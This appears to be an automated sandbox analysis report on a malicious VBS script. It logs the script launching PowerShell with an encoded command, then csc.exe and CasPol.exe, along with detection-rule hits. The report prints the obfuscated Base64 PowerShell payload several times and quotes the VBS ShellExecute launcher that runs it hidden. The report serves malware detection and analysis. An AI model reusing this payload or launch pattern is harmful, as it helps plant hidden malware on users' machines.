Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "JABNAGkAbABqAHYAcgBuAGUAdABsACAAPQAgAEAAJwANAAoASQBtACQASABhAHUAUwB0AHYAQQBzAG8ARwByAHIARgBpADkAVABpACAAQgBpAD0AYQBmACAAQQBmACIAQQBmAFYARABpAGkAUgBlAHIAUwBwAHQAQQBmAHUATABvAGEAUgBlAGwASwBhAEEAUAB0AGwAQQBnAGwAUgBlAG8AUgBlAGMAUABoACIACgBTAHQAQQBLAG8AZABDAGgAZABMAHUALQBCAG8AVABJAGQAeQBsAGUAcABSAGkAZQBBAG4AIABlAHEALQBTAGsAVABOAGUAeQBVAG4AcABFAHMAZQBTAHQARABDAGEAZQBPAHAAZgBWAGUAaQBQAG8AbgBEAGUAaQBJAGQAdABTAHQAaQBBAHQAbwBOAG8AbgBLAGUAIABDAGgAQABWAGUAIgAKAHUAZAB1AEYAbwBzAFIAZQBpAEEAawBuAGEAZgBnAEEAcwAgAEwAZQBTAE8AcAB5AEMAeQBzAFMAZQB0AEQAaQBlAEEAbgBtAFAAcgA7AAoAdABpAHUARgBhAHMAQQBwAGkASQBuAG4AbwBwAGcASQBuACAAQgBhAFMATwBwAHkAQQBrAHMAVQBuAHQAVgBpAGUATQBlAG0AVgBlAC4AdgBlAFIAbwB2AHUAQwBvAG4AZQB4AHQAVABhAGkARABpAG0ATABhAGUAUwB0AC4AVgBlAEkAQgBpAG4ASwBvAHQARwBvAGUAQwBpAHIAQQBuAG8ARgBsAHAAWQBvAFMAVABoAGUAVQBuAHIAZQBpAHYAVQBkAGkARwBzAGMAUwBoAGUAUgBvAHMAUABsADsACgBPAHAAcABTAHkAdQBSAGEAYgBGAGEAbABNAGEAaQBXAGkAYwB1AG4AIABBAHUAcwBJAG4AdABQAG8AYQBVAHAAdABTAGEAaQBHAHIAYwBEAG8AIABzAGsAYwByAGkAbABNAGkAYQBXAG8AcwBGAHIAcwBpAG4AIABTAHQAQwBHAGkAbABWAG8AYQBTAHUAZABJAG4AbwBNAHkAZwBHAHQAZQBTAHQAbgBBAHIAZQBGAGEAdABMAG8AMQAKAFMAcAB7AEEAcwBbAEcAbgBEAGIAZQBsAFUAbgBsAEIAdQBJAEYAeQBtAEQAbwBwAEYAYQBvAFYAZQByAFQAcgB0AFUAbgAoAFAAaAAiAEsAZQB1AFUAaQBzAFMAdQBlAFAAcwByAEYAbgAzAEEAcAAyAHMAawAiAHQAcgApAEcAcgBdAEUAbgBwAFAAaQB1AE8AcABiAFMAdABsAHMAYQBpAFMAcABjAFYAaQAgAFMAdQBzAFAAbwB0AEgAYQBhAFMAawB0AEIAZQBpAFMAYwBjAFUAbgAgAEQAaQBlAEUAcgB4AFAAdQB0AFMAdgBlAEEAcgByAFcAYQBuAEkAbgAgAEcAZwBpAFAAZQBuAE0AYQB0AFUAbgAgAHQAcgBDAFAAaQByAEEAYQBlAEQAZQBhAFMAbAB0AFMAdABlAEsAbABNAEIAdQBEAFAAbABJAGkAbgBXAFUAbgBpAEUAbABuAHMAdABkAFIAZQBvAFYAYQB3AE0AYQAoAEwAYQBpAEEAbgBuAFMAawB0AFMAdAAgAEIAZQBOAEYAbAB2AFUAbgBoAEkAcgBpAEUAbQBlAEMAbwAsAEEAbgBpAEMAaABuAFAAcgB0AEQAaQAgAEYAbwBIAEwAYQBlAEsAbABhAEIAZQAsAGQAcgBpAFQAYQBuAEYAbwB0AEIAZQAgAFIAZQBoAFAAYQBhAEYAbwB0AGEAZgBjAEIAcgBoAFQAcgAsAEwAYQBpAEIAcgBuAEYAbwB0AFQAZQAgAFUAbgBQAFQAbwBpAEIAbwBuAE0AYQBpAEQAaQAsAE0AZQBpAE4AbwBuAEYAagB0AEMAaAAgAGQAdQBPAE0AYQB2AEgAZQBlAE8AcgByAFMAYQBpAFMAbAAsAEYAbwBpAE4AYQBuAHIAZQB0AE8AdgAgAFAAZQBSAHUAbgBlAEEAbgBjAE8AYgBpAE0AbwB0AEUAbABhAHAAYQAsAFIAZQBpAFMAYQBuAEMAYQB0AEgAYQAgAFAAcgBPAEcAbwBwAEEAdQBrAFMAbgByAE4AbwAsAEIAcgBpAG0AYQBuAEkAbgB0AEQAYQAgAEEAdQBDAFIAaQByAFAAcgBvAEgAYQBjAEgAZQBrAHMAawAsAGEAawBpAFIAdQBuAEgAeQB0AE0AZQAgAE0AYQBBAFAAaAB1AE4AYQB0AFkAbwBvAEEAcwBzAFMAZAAsAEcAdQBpAEEAZgBuAEEAcAB0AFMAawAgAFUAbgBSAFAAbABlAEEAZgB0AFMAawByAFcAcgApAE8AcAA7AAoARwBsAFsAVABhAEQAVABlAGwASABvAGwAQQBuAEkARABvAG0AUwBuAHAATgBvAG8AYQB1AHIAUwBrAHQATwBjACgARwBsACIATABpAHcASAB5AGkAUwBhAG4ATwBiAG0AYQBjAG0AQgBhAC4AUwBtAGQAcABoAGwATwBuAGwAUABhACIAYQBsACkARQB4AF0AQQByAHAATQBvAHUAUwBpAGIAQQBhAGwAVABlAGkARABpAGMAUgBpACAAUwB0AHMARABlAHQATQBlAGEAQwB1AHQAQgBlAGkAVABoAGMATABhACAAQwBvAGUARABhAHgARQByAHQAdABvAGUAVABhAHIAQQBtAG4AUgB1ACAAQQByAGkARwByAG4ARwByAHQATABvACAAaABlAEcATABlAGUAVABhAHQAQQBxAEQARQBrAHIATQB5AGkARABvAHYAagBvAGUASABvAHIATA
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "JABNAGkAbABqAHYAcgBuAGUAdABsACAAPQAgAEAAJwANAAoASQBtACQASABhAHUAUwB0AHYAQQBzAG8ARwByAHIARgBpADkAVABpACAAQgBpAD0AYQBmACAAQQBmACIAQQBmAFYARABpAGkAUgBlAHIAUwBwAHQAQQBmAHUATABvAGEAUgBlAGwASwBhAEEAUAB0AGwAQQBnAGwAUgBlAG8AUgBlAGMAUABoACIACgBTAHQAQQBLAG8AZABDAGgAZABMAHUALQBCAG8AVABJAGQAeQBsAGUAcABSAGkAZQBBAG4AIABlAHEALQBTAGsAVABOAGUAeQBVAG4AcABFAHMAZQBTAHQARABDAGEAZQBPAHAAZgBWAGUAaQBQAG8AbgBEAGUAaQBJAGQAdABTAHQAaQBBAHQAbwBOAG8AbgBLAGUAIABDAGgAQABWAGUAIgAKAHUAZAB1AEYAbwBzAFIAZQBpAEEAawBuAGEAZgBnAEEAcwAgAEwAZQBTAE8AcAB5AEMAeQBzAFMAZQB0AEQAaQBlAEEAbgBtAFAAcgA7AAoAdABpAHUARgBhAHMAQQBwAGkASQBuAG4AbwBwAGcASQBuACAAQgBhAFMATwBwAHkAQQBrAHMAVQBuAHQAVgBpAGUATQBlAG0AVgBlAC4AdgBlAFIAbwB2AHUAQwBvAG4AZQB4AHQAVABhAGkARABpAG0ATABhAGUAUwB0AC4AVgBlAEkAQgBpAG4ASwBvAHQARwBvAGUAQwBpAHIAQQBuAG8ARgBsAHAAWQBvAFMAVABoAGUAVQBuAHIAZQBpAHYAVQBkAGkARwBzAGMAUwBoAGUAUgBvAHMAUABsADsACgBPAHAAcABTAHkAdQBSAGEAYgBGAGEAbABNAGEAaQBXAGkAYwB1AG4AIABBAHUAcwBJAG4AdABQAG8AYQBVAHAAdABTAGEAaQBHAHIAYwBEAG8AIABzAGsAYwByAGkAbABNAGkAYQBXAG8AcwBGAHIAcwBpAG4AIABTAHQAQwBHAGkAbABWAG8AYQBTAHUAZABJAG4AbwBNAHkAZwBHAHQAZQBTAHQAbgBBAHIAZQBGAGEAdABMAG8AMQAKAFMAcAB7AEEAcwBbAEcAbgBEAGIAZQBsAFUAbgBsAEIAdQBJAEYAeQBtAEQAbwBwAEYAYQBvAFYAZQByAFQAcgB0AFUAbgAoAFAAaAAiAEsAZQB1AFUAaQBzAFMAdQBlAFAAcwByAEYAbgAzAEEAcAAyAHMAawAiAHQAcgApAEcAcgBdAEUAbgBwAFAAaQB1AE8AcABiAFMAdABsAHMAYQBpAFMAcABjAFYAaQAgAFMAdQBzAFAAbwB0AEgAYQBhAFMAawB0AEIAZQBpAFMAYwBjAFUAbgAgAEQAaQBlAEUAcgB4AFAAdQB0AFMAdgBlAEEAcgByAFcAYQBuAEkAbgAgAEcAZwBpAFAAZQBuAE0AYQB0AFUAbgAgAHQAcgBDAFAAaQByAEEAYQBlAEQAZQBhAFMAbAB0AFMAdABlAEsAbABNAEIAdQBEAFAAbABJAGkAbgBXAFUAbgBpAEUAbABuAHMAdABkAFIAZQBvAFYAYQB3AE0AYQAoAEwAYQBpAEEAbgBuAFMAawB0AFMAdAAgAEIAZQBOAEYAbAB2AFUAbgBoAEkAcgBpAEUAbQBlAEMAbwAsAEEAbgBpAEMAaABuAFAAcgB0AEQAaQAgAEYAbwBIAEwAYQBlAEsAbABhAEIAZQAsAGQAcgBpAFQAYQBuAEYAbwB0AEIAZQAgAFIAZQBoAFAAYQBhAEYAbwB0AGEAZgBjAEIAcgBoAFQAcgAsAEwAYQBpAEIAcgBuAEYAbwB0AFQAZQAgAFUAbgBQAFQAbwBpAEIAbwBuAE0AYQBpAEQAaQAsAE0AZQBpAE4AbwBuAEYAagB0AEMAaAAgAGQAdQBPAE0AYQB2AEgAZQBlAE8AcgByAFMAYQBpAFMAbAAsAEYAbwBpAE4AYQBuAHIAZQB0AE8AdgAgAFAAZQBSAHUAbgBlAEEAbgBjAE8AYgBpAE0AbwB0AEUAbABhAHAAYQAsAFIAZQBpAFMAYQBuAEMAYQB0AEgAYQAgAFAAcgBPAEcAbwBwAEEAdQBrAFMAbgByAE4AbwAsAEIAcgBpAG0AYQBuAEkAbgB0AEQAYQAgAEEAdQBDAFIAaQByAFAAcgBvAEgAYQBjAEgAZQBrAHMAawAsAGEAawBpAFIAdQBuAEgAeQB0AE0AZQAgAE0AYQBBAFAAaAB1AE4AYQB0AFkAbwBvAEEAcwBzAFMAZAAsAEcAdQBpAEEAZgBuAEEAcAB0AFMAawAgAFUAbgBSAFAAbABlAEEAZgB0AFMAawByAFcAcgApAE8AcAA7AAoARwBsAFsAVABhAEQAVABlAGwASABvAGwAQQBuAEkARABvAG0AUwBuAHAATgBvAG8AYQB1AHIAUwBrAHQATwBjACgARwBsACIATABpAHcASAB5AGkAUwBhAG4ATwBiAG0AYQBjAG0AQgBhAC4AUwBtAGQAcABoAGwATwBuAGwAUABhACIAYQBsACkARQB4AF0AQQByAHAATQBvAHUAUwBpAGIAQQBhAGwAVABlAGkARABpAGMAUgBpACAAUwB0AHMARABlAHQATQBlAGEAQwB1AHQAQgBlAGkAVABoAGMATABhACAAQwBvAGUARABhAHgARQByAHQAdABvAGUAVABhAHIAQQBtAG4AUgB1ACAAQQByAGkARwByAG4ARwByAHQATABvACAAaABlAEcATABlAGUAVABhAHQAQQBxAEQARQBrAHIATQB5AGkARABvAHYAagBvAGUASABvAHIATA			Jump to behavior

Potential malicious VBS script found (suspicious strings)

Source:

Initial file: Strygeorke.ShellExecute Flogste, "-NoExit -E" & Sammentr(110) & Sammentr(99) & "oded" & "Command " & chr(34) & Ambulating58 & chr(34), "", "", 0

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 13732
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 13732			Jump to behavior

Source: 0000001A.00000000.1970106356.0000000001350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000002.2220743788.0000000009E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000002.2103587544.0000000004C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000002.2099293106.0000000003010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000002.2096104717.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000003.1512001892.0000000002F62000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000003.1609777781.00000000086AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000002.2094575687.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000002.2098442263.0000000002F6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000002.2100345664.0000000003290000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000003.1523532169.0000000002F6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000002.2105674011.0000000005081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: Process Memory Space: powershell.exe PID: 9092, type: MEMORYSTR	Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: Process Memory Space: CasPol.exe PID: 6564, type: MEMORYSTR	Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08506D00	20_2_08506D00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_0850E468	20_2_0850E468
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_0850E458	20_2_0850E458
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_088C53C8	20_2_088C53C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_088C2AC8	20_2_088C2AC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_088C2AD8	20_2_088C2AD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_088E91A8	20_2_088E91A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_088EB1A0	20_2_088EB1A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_088EA960	20_2_088EA960
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_088E6A60	20_2_088E6A60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_088E73A8	20_2_088E73A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_088E9BC8	20_2_088E9BC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_088E64F8	20_2_088E64F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_088E25E8	20_2_088E25E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_088E5758	20_2_088E5758
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08950006	20_2_08950006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08950040	20_2_08950040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_089552B0	20_2_089552B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_089552C0	20_2_089552C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08B6E940	20_2_08B6E940
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08B6D6E8	20_2_08B6D6E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08C69118	20_2_08C69118
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08C6AA00	20_2_08C6AA00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08D12C07	20_2_08D12C07
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08D10F33	20_2_08D10F33
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08D128C0	20_2_08D128C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_1DAD7020	26_2_1DAD7020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_1DADA220	26_2_1DADA220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_1DAD9950	26_2_1DAD9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_1DAD9608	26_2_1DAD9608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20B03405	26_2_20B03405
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20B0E6D0	26_2_20B0E6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20B05626	26_2_20B05626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20B0AE49	26_2_20B0AE49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20B094B1	26_2_20B094B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20B0567F	26_2_20B0567F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20B01E48	26_2_20B01E48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20C2007B	26_2_20C2007B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20C24AD8	26_2_20C24AD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20C2BE28	26_2_20C2BE28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20C2D390	26_2_20C2D390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20C22F60	26_2_20C22F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20C2BC3B	26_2_20C2BC3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20C291E8	26_2_20C291E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20C29588	26_2_20C29588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20C25280	26_2_20C25280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20C29E28	26_2_20C29E28

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: String function: 1DADD130 appears 54 times

Source: PUMP mt310143121.vbs

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\wscript.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: edgegdi.dll	Jump to behavior

Source: PUMP mt310143121.vbs

Virustotal: Detection: 8%

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PUMP mt310143121.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "JABNAGkAbABqAHYAcgBuAGUAdABsACAAPQAgAEAAJwANAAoASQBtACQASABhAHUAUwB0AHYAQQBzAG8ARwByAHIARgBpADkAVABpACAAQgBpAD0AYQBmACAAQQBmACIAQQBmAFYARABpAGkAUgBlAHIAUwBwAHQAQQBmAHUATABvAGEAUgBlAGwASwBhAEEAUAB0AGwAQQBnAGwAUgBlAG8AUgBlAGMAUABoACIACgBTAHQAQQBLAG8AZABDAGgAZABMAHUALQBCAG8AVABJAGQAeQBsAGUAcABSAGkAZQBBAG4AIABlAHEALQBTAGsAVABOAGUAeQBVAG4AcABFAHMAZQBTAHQARABDAGEAZQBPAHAAZgBWAGUAaQBQAG8AbgBEAGUAaQBJAGQAdABTAHQAaQBBAHQAbwBOAG8AbgBLAGUAIABDAGgAQABWAGUAIgAKAHUAZAB1AEYAbwBzAFIAZQBpAEEAawBuAGEAZgBnAEEAcwAgAEwAZQBTAE8AcAB5AEMAeQBzAFMAZQB0AEQAaQBlAEEAbgBtAFAAcgA7AAoAdABpAHUARgBhAHMAQQBwAGkASQBuAG4AbwBwAGcASQBuACAAQgBhAFMATwBwAHkAQQBrAHMAVQBuAHQAVgBpAGUATQBlAG0AVgBlAC4AdgBlAFIAbwB2AHUAQwBvAG4AZQB4AHQAVABhAGkARABpAG0ATABhAGUAUwB0AC4AVgBlAEkAQgBpAG4ASwBvAHQARwBvAGUAQwBpAHIAQQBuAG8ARgBsAHAAWQBvAFMAVABoAGUAVQBuAHIAZQBpAHYAVQBkAGkARwBzAGMAUwBoAGUAUgBvAHMAUABsADsACgBPAHAAcABTAHkAdQBSAGEAYgBGAGEAbABNAGEAaQBXAGkAYwB1AG4AIABBAHUAcwBJAG4AdABQAG8AYQBVAHAAdABTAGEAaQBHAHIAYwBEAG8AIABzAGsAYwByAGkAbABNAGkAYQBXAG8AcwBGAHIAcwBpAG4AIABTAHQAQwBHAGkAbABWAG8AYQBTAHUAZABJAG4AbwBNAHkAZwBHAHQAZQBTAHQAbgBBAHIAZQBGAGEAdABMAG8AMQAKAFMAcAB7AEEAcwBbAEcAbgBEAGIAZQBsAFUAbgBsAEIAdQBJAEYAeQBtAEQAbwBwAEYAYQBvAFYAZQByAFQAcgB0AFUAbgAoAFAAaAAiAEsAZQB1AFUAaQBzAFMAdQBlAFAAcwByAEYAbgAzAEEAcAAyAHMAawAiAHQAcgApAEcAcgBdAEUAbgBwAFAAaQB1AE8AcABiAFMAdABsAHMAYQBpAFMAcABjAFYAaQAgAFMAdQBzAFAAbwB0AEgAYQBhAFMAawB0AEIAZQBpAFMAYwBjAFUAbgAgAEQAaQBlAEUAcgB4AFAAdQB0AFMAdgBlAEEAcgByAFcAYQBuAEkAbgAgAEcAZwBpAFAAZQBuAE0AYQB0AFUAbgAgAHQAcgBDAFAAaQByAEEAYQBlAEQAZQBhAFMAbAB0AFMAdABlAEsAbABNAEIAdQBEAFAAbABJAGkAbgBXAFUAbgBpAEUAbABuAHMAdABkAFIAZQBvAFYAYQB3AE0AYQAoAEwAYQBpAEEAbgBuAFMAawB0AFMAdAAgAEIAZQBOAEYAbAB2AFUAbgBoAEkAcgBpAEUAbQBlAEMAbwAsAEEAbgBpAEMAaABuAFAAcgB0AEQAaQAgAEYAbwBIAEwAYQBlAEsAbABhAEIAZQAsAGQAcgBpAFQAYQBuAEYAbwB0AEIAZQAgAFIAZQBoAFAAYQBhAEYAbwB0AGEAZgBjAEIAcgBoAFQAcgAsAEwAYQBpAEIAcgBuAEYAbwB0AFQAZQAgAFUAbgBQAFQAbwBpAEIAbwBuAE0AYQBpAEQAaQAsAE0AZQBpAE4AbwBuAEYAagB0AEMAaAAgAGQAdQBPAE0AYQB2AEgAZQBlAE8AcgByAFMAYQBpAFMAbAAsAEYAbwBpAE4AYQBuAHIAZQB0AE8AdgAgAFAAZQBSAHUAbgBlAEEAbgBjAE8AYgBpAE0AbwB0AEUAbABhAHAAYQAsAFIAZQBpAFMAYQBuAEMAYQB0AEgAYQAgAFAAcgBPAEcAbwBwAEEAdQBrAFMAbgByAE4AbwAsAEIAcgBpAG0AYQBuAEkAbgB0AEQAYQAgAEEAdQBDAFIAaQByAFAAcgBvAEgAYQBjAEgAZQBrAHMAawAsAGEAawBpAFIAdQBuAEgAeQB0AE0AZQAgAE0AYQBBAFAAaAB1AE4AYQB0AFkAbwBvAEEAcwBzAFMAZAAsAEcAdQBpAEEAZgBuAEEAcAB0AFMAawAgAFUAbgBSAFAAbABlAEEAZgB0AFMAawByAFcAcgApAE8AcAA7AAoARwBsAFsAVABhAEQAVABlAGwASABvAGwAQQBuAEkARABvAG0AUwBuAHAATgBvAG8AYQB1AHIAUwBrAHQATwBjACgARwBsACIATABpAHcASAB5AGkAUwBhAG4ATwBiAG0AYQBjAG0AQgBhAC4AUwBtAGQAcABoAGwATwBuAGwAUABhACIAYQBsACkARQB4AF0AQQByAHAATQBvAHUAUwBpAGIAQQBhAGwAVABlAGkARABpAGMAUgBpACAAUwB0AHMARABlAHQATQBlAGEAQwB1AHQAQgBlAGkAVABoAGMATABhACAAQwBvAGUARABhAHgARQByAHQAdABvAGUAVABhAHIAQQBtAG4AUgB1ACAAQQByAGkARwByAG4ARwByAHQATABvACAAaABlAEcATABlAGUAVABhAHQAQQBxAEQARQBrAHIATQB5AGkARABvAHYAagBvAGUASABvAHIATA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA2B2.tmp" "c:\Users\user\AppData\Local\Temp\sepi5xx1\CSC7F7A267C826A46D5AA3589EC91649B9.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
